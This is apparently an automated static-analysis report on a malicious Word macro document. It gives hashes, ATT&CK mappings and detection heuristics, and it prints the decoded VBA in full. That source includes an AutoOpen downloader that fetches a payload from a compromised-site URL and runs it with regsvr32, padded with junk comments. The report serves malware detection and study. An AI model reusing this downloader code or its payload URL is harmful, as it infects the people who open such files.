Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 16e28494025fa62c…

MALICIOUS

Office (OOXML)

114.3 KB Created: 2020-07-01 09:29:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-07-24
MD5: 651d2488b189f5e993990fe94dab3d95 SHA-1: f9c4c079d1f548392e55a935eb3d323ec5de25bb SHA-256: 16e28494025fa62cfc22e7d22ff11c47aee04ebff4e7d76f9393499d4f7c72f1
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros with an AutoOpen function that is triggered upon opening the document. This macro utilizes URLDownloadToFile to download a payload from the reconstructed URL 'http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~' and saves it as 'c:\programdata\1.dat'. The presence of the AutoOpen macro and the use of URLDownloadToFile strongly indicate a downloader functionality.

Heuristics 7

  • ClamAV: Doc.Downloader.GreenBox6-9139694-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.GreenBox6-9139694-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 And Win64 Then
Public Declare PtrSafe Function fF Lib "urlmon" Alias "URLDownloadToFileA" (ByVal a6 As LongPtr, ByVal WS As String, ByVal Da As String, ByVal Db As LongPtr, ByVal pi As LongPtr) As Long
#Else
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Dim mF As New WshShell
mF.exec "regsvr32 c:\programdata\1.dat"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "Q"
Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~ Referenced by macro
    • http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~�Referenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2780 bytes
SHA-256: e4e140dfe405d8088f794388e9ced19f898c5a7ad64926b02c326f204d0731d3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Q"
Sub autoopen()

' Specter
' Tuft riverside simply oxygen vestal drivers
' Manufacturing refer gild gifts sulphurous
' Valparaiso different reinforce
' Defence deadline dawns fx
X8 = fF(0, "http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~", "c:\programdata\1.dat", 0, 0)

' Harper voluble birthplace
' Campaign omega
' Fourth taxi
' Mesa telecom including loop
s
End Sub

Attribute VB_Name = "Q1"
Sub s()

' Incorrigible catechism
' Operatic prospective
' Exemplary mongol houseless
' Impost
' Specifically

' Instigation like abrogated
' Contraction above-mentioned corn
' November runtime
' Bin fragile deleterious specifications legislature
' Minister viewpicture
' Rectitude motors vbulletin elect

' Bewitch stamp scholars twenty-sixth
' Sight propaganda lynching ruling corset
' Msgstr disprove intellectual photographer trump placing

' Shorthand forecast liz mathematics kids bronchitis
' Roma allege ninety-five pun obj
' Compression javelin
' Ballet consortium

' Conditional
' Efface same passively
' Piedmont predicted judgment obtrusive

' Notifications disbelief
' Baize pants chic
' Denudation enumeration bayonet container calling
' Book hiv wrench

' Sucked subservient
' Geology cavalcade
' Cooked infectious acrobat
' Wi fork

' Malayan degrade shed disappoint liz dislodge
' Controlled succinct savor copiously
' Peking blog doggerel
' Magnesia cherry spelling
Dim mF As New WshShell
mF.exec "regsvr32 c:\programdata\1.dat"

' Foreign worldsex tools traditionary
' Banana cause
' Audit ionian vocals
End Sub

Attribute VB_Name = "OI"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function fF Lib "urlmon" Alias "URLDownloadToFileA" (ByVal a6 As LongPtr, ByVal WS As String, ByVal Da As String, ByVal Db As LongPtr, ByVal pi As LongPtr) As Long
#Else
Public Declare Function fF Lib "urlmon" Alias "URLDownloadToFileA"(ByVal a6 As Long, ByVal WS As String, ByVal Da As String, ByVal Db As Long, ByVal pi As Long) As Long
#End If
Function tC(vk)

' Vermont crop alfonso passer shorn
' Recorders witnesses hydrocodone recognised impartially clap won
' Fw pointed mm
' Excuse til grove massive flux medusa
' Miscreant flexible contrite accounting
' Belied spatial
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 21504 bytes
SHA-256: f7d1e1f1a9554d6e2fb5afb160b316ce78791e5eaa1364db0579e5d44264d2ab

Open this report in the interactive analyzer, or submit your own file for analysis.